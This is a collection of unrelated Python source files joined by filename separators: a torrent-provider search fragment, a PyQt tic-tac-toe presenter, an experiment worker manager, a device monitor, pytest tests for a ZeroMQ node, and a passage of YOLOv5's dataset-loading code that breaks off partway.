method (str): Type of search, can be ``general``, ``movie``, ``show``, ``season`` or ``anime``
"""
log.debug("Processing %s with %s method" % (provider, method))
filterInstance = Filtering()
if method == 'movie':
filterInstance.use_movie(provider, payload)
elif method == 'season':
filterInstance.use_season(provider, payload)
elif method == 'episode':
filterInstance.use_episode(provider, payload)
elif method == 'anime':
filterInstance.use_anime(provider, payload)
else:
filterInstance.use_general(provider, payload)
if 'is_api' in definitions[provider]:
results = process(provider=provider, generator=extract_from_api, filtering=filterInstance, has_special=payload['has_special'])
else:
results = process(provider=provider, generator=extract_torrents, filtering=filterInstance, has_special=payload['has_special'])
got_results(provider, results)
def get_search_query(definition, key):
if 'parser' not in definition or key not in definition['parser']:
return ""
if key == 'key' or key == 'table' or key == 'row':
return "dom." + definition['parser'][key]
return definition['parser'][key]
|
presenter.py | from PyQt5 import QtWidgets, QtGui
from game import Machine
from player import Player, HumanPlayer
import sys
import threading
import const
import view
class Presenter:
def __init__(self, _view: view.View):
self.view = _view
self.games = 0
self.isTraining = False
self.player2 = HumanPlayer("p2", -1)
self.player1 = Player("pl", 1)
self.player1.load_policy(const.POLICY1)
self.machine = None
self.game_type = ""
self.disabled_action = True # disable ability to click on board
self.t = None # thread
self.mode = -1
def setup(self):
self.view.statusbar.showMessage(self.game_type)
self.machine = Machine(self.player1,
self.player2,
self.computer_action,
self.show_winner_nodes,
self.update_score)
def new_game(self):
if threading.active_count() > 1: # it prevents from clicking many times button 'new game'
return # and creating too many useless threads
self.game_type = const.GAME_TYPE_1
self.disabled_action = False
if isinstance(self.player2, Player):
self.player2 = HumanPlayer("p2", self.mode)
if self.t is not None and self.t.stopped() is False:
self.t.stop()
self.clean_board()
self.setup()
self.t = StoppableThread(target=self.start_human_vs_comp, reset=self.machine.set_end)
self.t.daemon = True # kill this thread when main thread is killed
self.t.start()
def comp_vs_comp(self):
if threading.active_count() > 1:
return
self.game_type = const.GAME_TYPE_2
self.disabled_action = True
self.change_to_cross(None)
self.player2 = Player("p2", -1)
self.player2.load_policy(const.POLICY2) # load second computer player
self.clean_board()
if self.t is not None and self.t.stopped() is False:
self.t.stop()
self.setup()
self.t = StoppableThread(target=self.start_comp_vs_comp, reset=self.machine.set_end)
self.t.daemon = True # kill this thread when main thread is killed
self.t.start()
def training(self):
if self.game_type == const.GAME_TYPE_3:
return
self.game_type = const.GAME_TYPE_3
self.disabled_action = True
self.player2 = Player("p_training2", -1)
self.player1 = Player("p_training1", 1)
self.clean_board()
self.reset_score()
if self.t is not None and self.t.stopped() is False:
self.t.stop()
self.setup()
self.t = StoppableThread(target=self.start_training, reset=self.machine.set_end)
self.t.daemon = True
self.t.start()
def start_training(self):
self.isTraining = True
self.machine.play(5000)
self.player1.save_policy()
self.player2.save_policy()
self.new_game()
self.isTraining = False
def start_human_vs_comp(self):
if self.mode != 1:
self.machine.play2()
else:
self.machine.play4()
def start_comp_vs_comp(self):
self.machine.play3()
def show_winner_nodes(self, switch: int, pos: int = 0):
if switch == 0: # row
for i in range(3):
self.view.board[pos * 3 + i].mark_as_winner()
elif switch == 1: # column
for i in range(3):
self.view.board[i * 3 + pos].mark_as_winner()
elif switch == 2: # diagonal \
for i in range(3):
self.view.board[i * 4].mark_as_winner()
elif switch == 3: # diagonal /
for i in range(3):
self.view.board[(i + 1) * 2].mark_as_winner()
def show(self):
app = QtWidgets.QApplication(sys.argv)
app.setWindowIcon(QtGui.QIcon('graphic/icon.ico'))
MainWindow = QtWidgets.QMainWindow()
self.view.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
def update_score(self, winner):
self.disabled_action = True # disable ability to click on board after match is finished
if self.player2.symbol == 1:
nought = self.player2
cross = self.player1
else:
cross = self.player2
nought = self.player1
if winner == 1:
nought.score += 1
self.view.circle_score.setText(str(nought.score))
self.view.statusbar.showMessage("Nought win!")
elif winner == -1:
cross.score += 1
self.view.cross_score.setText(str(cross.score))
self.view.statusbar.showMessage("Cross win!")
else:
self.view.statusbar.showMessage("Tie!")
self.games += 1
self.view.games_label.setText(str(self.games))
def computer_action(self, action, symbol: int):
a = int(action[0])
b = int(action[1])
index = a * 3 + b
self.view.board[index].action(symbol)
def action(self, i_node: int):
if self.disabled_action:
return
self.view.board[i_node].action(self.player2.symbol)
self.player2.click(i_node)
def clean_board(self):
for node in self.view.board:
node.reset()
def reset_score(self):
self.view.circle_score.setText("0")
self.view.cross_score.setText("0")
self.games = 0
self.view.games_label.setText(str(self.games))
def change_to_circle(self, event):
"""Human play first"""
if self.isTraining: return # don't allow to change who play first during training
if self.player2.symbol == 1: return
self.mode = 1
self.player2.symbol = 1 # change human player's letter to circle
self.player1.symbol = -1
self.player1.load_policy(const.POLICY2)
self.view.statusbar.showMessage("You play circle")
def change_to_cross(self, event):
"""Computer play first"""
if self.isTraining: return # don't allow to change who play first during training
if self.player2.symbol == -1: return
self.mode = -1
self.player2.symbol = -1
self.player1.symbol = 1
self.player1.load_policy(const.POLICY1)
self.view.statusbar.showMessage("You play cross")
def exit(self):
exit()
class StoppableThread(threading.Thread):
def __init__(self, target, reset):
super(StoppableThread, self).__init__(target=target)
self._stop_event = threading.Event()
self.reset = reset
def stop(self):
self.reset()
self._stop_event.set()
def stopped(self):
return self._stop_event.is_set()
|
worker_manager.py | """
A manager for multiple workers.
-- kandasamy@cs.cmu.edu
"""
# pylint: disable=invalid-name
# pylint: disable=abstract-class-not-used
# pylint: disable=abstract-class-little-used
from __future__ import print_function
from __future__ import division
from argparse import Namespace
from multiprocessing import Process
import numpy as np
import os
try:
from sets import Set
except ImportError:
Set = set
import shutil
import time
# Local
from .exd_utils import EVAL_ERROR_CODE
_TIME_TOL = 1e-5
class WorkerManager(object):
""" A Base class for a worker manager. """
def __init__(self, worker_ids):
""" Constructor. """
if hasattr(worker_ids, '__iter__'):
self.worker_ids = worker_ids
else:
self.worker_ids = list(range(worker_ids))
self.num_workers = len(self.worker_ids)
# These will be set in reset
self.experiment_designer = None
self.latest_results = None
# Reset
self.reset()
def reset(self):
""" Resets everything. """
self.experiment_designer = None
self.latest_results = [] # A list of namespaces
self._child_reset()
def _child_reset(self):
""" Child reset. """
raise NotImplementedError('Implement in a child class.')
def fetch_latest_results(self):
""" Returns the latest results. """
ret_idxs = []
for i in range(len(self.latest_results)):
if (self.latest_results[i].receive_time <=
self.experiment_designer.get_curr_spent_capital() + _TIME_TOL):
ret_idxs.append(i)
keep_idxs = [i for i in range(len(self.latest_results)) if i not in ret_idxs]
ret = [self.latest_results[i] for i in ret_idxs]
self.latest_results = [self.latest_results[i] for i in keep_idxs]
return ret
def close_all_queries(self):
""" Closes all queries. """
raise NotImplementedError('Implement in a child class.')
def set_experiment_designer(self, experiment_designer):
""" Set the experiment designer. """
self.experiment_designer = experiment_designer
def a_worker_is_free(self):
""" Returns true if a worker is free. """
raise NotImplementedError('Implement in a child class.')
def all_workers_are_free(self):
""" Returns true if all workers are free. """
raise NotImplementedError('Implement in a child class.')
def _dispatch_experiment(self, func_caller, qinfo, **kwargs):
""" Dispatches job. """
raise NotImplementedError('Implement in a child class.')
def dispatch_single_experiment(self, func_caller, qinfo, **kwargs):
""" Dispatches job. """
raise NotImplementedError('Implement in a child class.')
def dispatch_batch_of_experiments(self, func_caller, qinfos, **kwargs):
""" Dispatches an entire batch of experiments. """
raise NotImplementedError('Implement in a child class.')
def get_time_distro_info(self):
""" Returns information on the time distribution. """
#pylint: disable=no-self-use
return ''
def get_poll_time_real(self):
""" Returns the poll time. """
raise NotImplementedError('Implement in a child class.')
# A synthetic worker manager - for simulating multiple workers ---------------------------
class SyntheticWorkerManager(WorkerManager):
""" A Worker manager for synthetic functions. Mostly to be used in simulations. """
def __init__(self, num_workers, time_distro='const', time_distro_params=None):
""" Constructor. """
self.worker_pipe = None
super(SyntheticWorkerManager, self).__init__(num_workers)
# Set up the time sampler
self.time_distro = time_distro
self.time_distro_params = time_distro_params
self.time_sampler = None
self._set_up_time_sampler()
def _set_up_time_sampler(self):
""" Set up the sampler for the time random variable. """
self.time_distro_params = Namespace() if self.time_distro_params is None else \
self.time_distro_params
if self.time_distro == 'caller_eval_cost':
pass
elif self.time_distro == 'const':
if not hasattr(self.time_distro_params, 'const_val'):
self.time_distro_params.const_val = 1
self.time_sampler = lambda num_samples: (np.ones((num_samples,)) *
self.time_distro_params.const_val)
elif self.time_distro == 'uniform':
if not hasattr(self.time_distro_params, 'ub'):
self.time_distro_params.ub = 2.0
self.time_distro_params.lb = 0.0
ub = self.time_distro_params.ub
lb = self.time_distro_params.lb
self.time_sampler = lambda num_samples: (np.random.random((num_samples,)) *
(ub - lb) + lb)
elif self.time_distro == 'halfnormal':
if not hasattr(self.time_distro_params, 'ub'):
self.time_distro_params.sigma = np.sqrt(np.pi/2)
self.time_sampler = lambda num_samples: np.abs(np.random.normal(
scale=self.time_distro_params.sigma, size=(num_samples,)))
else:
raise NotImplementedError('Not implemented time_distro = %s yet.'%(
self.time_distro))
def _child_reset(self):
""" Child reset. """
self.worker_pipe = [[wid, 0.0] for wid in self.worker_ids]
def sort_worker_pipe(self):
""" Sorts worker pipe by finish time. """
self.worker_pipe.sort(key=lambda x: x[-1])
def a_worker_is_free(self):
""" Returns true if a worker is free. """
return self.worker_pipe[0][-1] # Always return true as this is synthetic.
def all_workers_are_free(self):
""" Returns true if all workers are free. """
return self.worker_pipe[-1][-1]
def close_all_queries(self):
""" Close all queries. """
pass
def _dispatch_experiment(self, func_caller, qinfo, worker_id, **kwargs):
""" Dispatch experiment. """
# Set worker id and whether or not eval_time should be returned
qinfo.worker_id = worker_id # indicate which worker
qinfo = func_caller.eval_from_qinfo(qinfo, **kwargs)
if self.time_distro == 'caller_eval_cost':
qinfo.eval_time = qinfo.caller_eval_cost
else:
qinfo.eval_time = float(self.time_sampler(1))
qinfo.receive_time = qinfo.send_time + qinfo.eval_time
# Store the result in latest_results
self.latest_results.append(qinfo)
return qinfo
def dispatch_single_experiment(self, func_caller, qinfo, **kwargs):
""" Dispatch a single experiment. """
worker_id = self.worker_pipe[0][0]
qinfo = self._dispatch_experiment(func_caller, qinfo, worker_id, **kwargs)
# Sort the pipe
self.worker_pipe[0][-1] = qinfo.receive_time
self.sort_worker_pipe()
def dispatch_batch_of_experiments(self, func_caller, qinfos, **kwargs):
""" Dispatches an entire batch of experiments. """
assert len(qinfos) == self.num_workers
for idx in range(self.num_workers):
qinfo = self._dispatch_experiment(func_caller, qinfos[idx],
self.worker_pipe[idx][0], **kwargs)
self.worker_pipe[idx][-1] = qinfo.receive_time
self.sort_worker_pipe()
def get_time_distro_info(self):
""" Returns information on the time distribution. """
return self.time_distro
def get_poll_time_real(self):
""" Return 0.0 as the poll time. """
return 0.0
# Real worker manager - for simulating multiple workers --------------------------------
class RealWorkerManager(WorkerManager):
""" A worker manager for resnet. """
# pylint: disable=attribute-defined-outside-init
def __init__(self, worker_ids, tmp_dir,
poll_time=0.5, sleep_time_after_new_process=0.5):
""" Constructor. """
super(RealWorkerManager, self).__init__(worker_ids)
self.poll_time = poll_time
self.sleep_time_after_new_process = sleep_time_after_new_process
self.tmp_dir = tmp_dir
self._rwm_set_up()
self._child_reset()
def _rwm_set_up(self):
""" Sets things up for the child. """
# Create the result directories. """
self.result_dir_names = {wid:'%s/result_%s'%(self.tmp_dir, str(wid)) for wid in
self.worker_ids}
# Create the working directories
self.working_dir_names = {wid:'%s/working_%s/tmp'%(self.tmp_dir,
str(wid)) for wid in self.worker_ids}
# Create the last receive times
self.last_receive_times = {wid:0.0 for wid in self.worker_ids}
# Create file names
self._result_file_name = 'result.txt'
self._num_file_read_attempts = 10
# self._file_read_poll_time = 0.5 # wait for 0.5 seconds
@classmethod
def _delete_dirs(cls, list_of_dir_names):
""" Deletes a list of directories. """
for dir_name in list_of_dir_names:
if os.path.exists(dir_name):
shutil.rmtree(dir_name)
@classmethod
def _delete_and_create_dirs(cls, list_of_dir_names):
""" Deletes a list of directories and creates new ones. """
for dir_name in list_of_dir_names:
if os.path.exists(dir_name):
shutil.rmtree(dir_name)
os.makedirs(dir_name)
def _child_reset(self):
""" Resets child. """
# Delete/create the result and working directories.
if not hasattr(self, 'result_dir_names'): # Just for the super constructor.
return
self._delete_and_create_dirs(self.result_dir_names.values())
self._delete_dirs(self.working_dir_names.values())
self.free_workers = Set(self.worker_ids)
self.qinfos_in_progress = {wid:None for wid in self.worker_ids}
self.worker_processes = {wid:None for wid in self.worker_ids}
def _get_result_file_name_for_worker(self, worker_id):
""" Computes the result file name for the worker. """
return os.path.join(self.result_dir_names[worker_id], self._result_file_name)
def _read_result_from_file(self, result_file_name):
""" Reads the result from the file name. """
#pylint: disable=bare-except
num_attempts = 0
while num_attempts < self._num_file_read_attempts:
try:
file_reader = open(result_file_name, 'r')
read_in = file_reader.read().strip()
try:
# try converting to float. If not successful, it is likely an error string.
read_in = float(read_in)
except:
pass
file_reader.close()
result = read_in
break
except:
print('Encountered error when reading %s. Trying again.'%(result_file_name))
time.sleep(self.poll_time)
file_reader.close()
result = EVAL_ERROR_CODE
return result
def _read_result_from_worker_and_update(self, worker_id):
""" Reads the result from the worker. """
# Read the file
result_file_name = self._get_result_file_name_for_worker(worker_id)
val = self._read_result_from_file(result_file_name)
# Now update the relevant qinfo and put it to latest_results
qinfo = self.qinfos_in_progress[worker_id]
qinfo.val = val
qinfo.receive_time = self.experiment_designer.get_curr_spent_capital()
qinfo.eval_time = qinfo.receive_time - qinfo.send_time
if not hasattr(qinfo, 'true_val'):
qinfo.true_val = val
self.latest_results.append(qinfo)
# Update receive time
self.last_receive_times[worker_id] = qinfo.receive_time
# Delete the file.
os.remove(result_file_name)
# Delete content in a working directory.
shutil.rmtree(self.working_dir_names[worker_id])
# Add the worker to the list of free workers and clear qinfos in progress.
self.worker_processes[worker_id].terminate()
self.worker_processes[worker_id] = None
self.qinfos_in_progress[worker_id] = None
self.free_workers.add(worker_id)
def _worker_is_free(self, worker_id):
""" Checks if worker with worker_id is free. """
if worker_id in self.free_workers:
return True
worker_result_file_name = self._get_result_file_name_for_worker(worker_id)
if os.path.exists(worker_result_file_name):
self._read_result_from_worker_and_update(worker_id)
else:
return False
def _get_last_receive_time(self):
""" Returns the last time we received a job. """
all_receive_times = self.last_receive_times.values()
return max(all_receive_times)
def a_worker_is_free(self):
""" Returns true if a worker is free. """
for wid in self.worker_ids:
if self._worker_is_free(wid):
return self._get_last_receive_time()
return None
def all_workers_are_free(self):
""" Returns true if all workers are free. """
all_are_free = True
for wid in self.worker_ids:
all_are_free = self._worker_is_free(wid) and all_are_free
if all_are_free:
return self._get_last_receive_time()
else:
return None
def _dispatch_experiment(self, func_caller, qinfo, worker_id, **kwargs):
""" Dispatches experiment to worker_id. """
#pylint: disable=star-args
if self.qinfos_in_progress[worker_id] is not None:
err_msg = 'qinfos_in_progress: %s,\nfree_workers: %s.'%(
str(self.qinfos_in_progress), str(self.free_workers))
print(err_msg)
raise ValueError('Check if worker is free before sending experiment.')
# First add all the data to qinfo
qinfo.worker_id = worker_id
qinfo.working_dir = self.working_dir_names[worker_id]
qinfo.result_file = self._get_result_file_name_for_worker(worker_id)
# Create the working directory
os.makedirs(qinfo.working_dir)
# Dispatch the experiment in a new process
target_func = lambda: func_caller.eval_from_qinfo(qinfo, **kwargs)
self.worker_processes[worker_id] = Process(target=target_func)
self.worker_processes[worker_id].start()
time.sleep(self.sleep_time_after_new_process)
# Add the qinfo to the in progress bar and remove from free_workers
self.qinfos_in_progress[worker_id] = qinfo
self.free_workers.discard(worker_id)
def dispatch_single_experiment(self, func_caller, qinfo, **kwargs):
""" Dispatches a single experiment to a free worker. """
worker_id = self.free_workers.pop()
self._dispatch_experiment(func_caller, qinfo, worker_id, **kwargs)
def dispatch_batch_of_experiments(self, func_caller, qinfos, **kwargs):
""" Dispatches a batch of experiments. """
assert len(qinfos) == self.num_workers
for idx in range(self.num_workers):
self._dispatch_experiment(func_caller, qinfos[idx], self.worker_ids[idx], **kwargs)
def close_all_queries(self):
""" Closes all queries. """
pass
def get_time_distro_info(self):
""" Returns information on the time distribution. """
return 'realtime'
def get_poll_time_real(self):
""" Return 0.0 as the poll time. """
return self.poll_time
# Some APIs
def get_default_worker_manager():
""" Return Synthetic worker manager. """
return SyntheticWorkerManager(1, time_distro='const')
|
monitor.py | from .reader.device_reader import DeviceReader
import threading
import time
import queue
class BasicMonitor:
def __init__(self, reader, proto_que=queue.Queue(), interval=0.5):
if not isinstance(reader, DeviceReader):
raise TypeError(f'reader should be a type of DeviceReader, get {type(reader)}.')
if not hasattr(proto_que, 'put') or not callable(proto_que.put):
raise TypeError('proto_que should has callable put attribute.')
self.reader = reader
self.stop_event = threading.Event()
self.proto_que = proto_que
self.interval = interval
self._thd = threading.Thread(target=self.monitor)
self.proto = self.get_proto(basic_info=True, matrix_info=True)
def get_proto(self, **kwargs):
proto = self.reader.to_proto(**kwargs)
return proto
def monitor(self):
t_start = time.time()
while not self.stop_event.is_set():
if time.time() - t_start >= self.interval:
proto = self.get_proto(basic_info=False, matrix_info=True)
self.proto.matrix.CopyFrom(proto.matrix)
self.proto_que.put(self.proto)
def start(self):
self.stop_event.clear()
self._thd.start()
def stop(self):
self.stop_event.set()
self._thd.join()
|
test_node.py | import time
from threading import Thread
from typing import Any, Dict
import pytest
from pabiana.utils import Interfaces
from pabiana.zmqs.node import Node
interfaces = {} # type: Interfaces
subscriptions = {} # type: Dict[str, Any]
@pytest.fixture(scope='module', autouse=True)
def setup():
interfaces.update({
'test-pub': {'ip': '127.0.0.1', 'port': 8279},
'test-rcv': {'ip': '127.0.0.1', 'port': 8280},
'area1-pub': {'ip': '130.0.0.2', 'port': 8281},
'area1-rcv': {'ip': '130.0.0.2', 'port': 8282},
'area2-pub': {'ip': '130.0.0.2', 'port': 8283, 'host': '0.0.0.0'},
'area2-rcv': {'ip': '130.0.0.2', 'port': 8284}
})
subscriptions.update({
'area1': {'slots': ['area1-slot1', 'area1-slot2']},
'area2': {'slots': None, 'buffer-length': 100}
})
def test_run_stop():
class TestNode(Node): pass
TestNode.__abstractmethods__ = set()
def stop(value):
time.sleep(0.5)
value.stop()
node = TestNode(name='area2', interfaces=interfaces)
t = Thread(target=stop, args=(node,))
t.start()
node.run(timeout=0, linger=0)
assert not t.isAlive()
def test_setup_run_stop():
class TestNode(Node): pass
TestNode.__abstractmethods__ = set()
def stop(value):
time.sleep(0.5)
value.stop()
node = TestNode(name='area2', interfaces=interfaces)
node.setup(puller=False, subscriptions=subscriptions)
t = Thread(target=stop, args=(node,))
t.start()
node.run(timeout=0, linger=0)
assert not t.isAlive()
|
datasets.py | # Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.general import xyxy2xywh, xywh2xyxy, xywhn2xyxy, xyn2xy, segment2box, segments2boxes, resample_segments, \
clean_str
from utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640, stride=32):
p = str(Path(path).absolute()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, stride=32):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print(f'{i + 1}/{n}: {s}... ', end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f' success ({w}x{h} at {fps:.2f} FPS).')
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0) # shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
success, im = cap.retrieve()
self.imgs[index] = im if success else self.imgs[index] * 0
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return ['txt'.join(x.replace(sa, sb, 1).rsplit(x.split('.')[-1], 1)) for x in img_paths]
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('**/*.*')) # pathlib
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache') # cached labels
if cache_path.is_file():
cache, exists = torch.load(cache_path), True # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'version' not in cache: # changed
cache, exists = self.cache_labels(cache_path, prefix), False # re-cache
else:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' for images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
cache.pop('version') # remove version
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
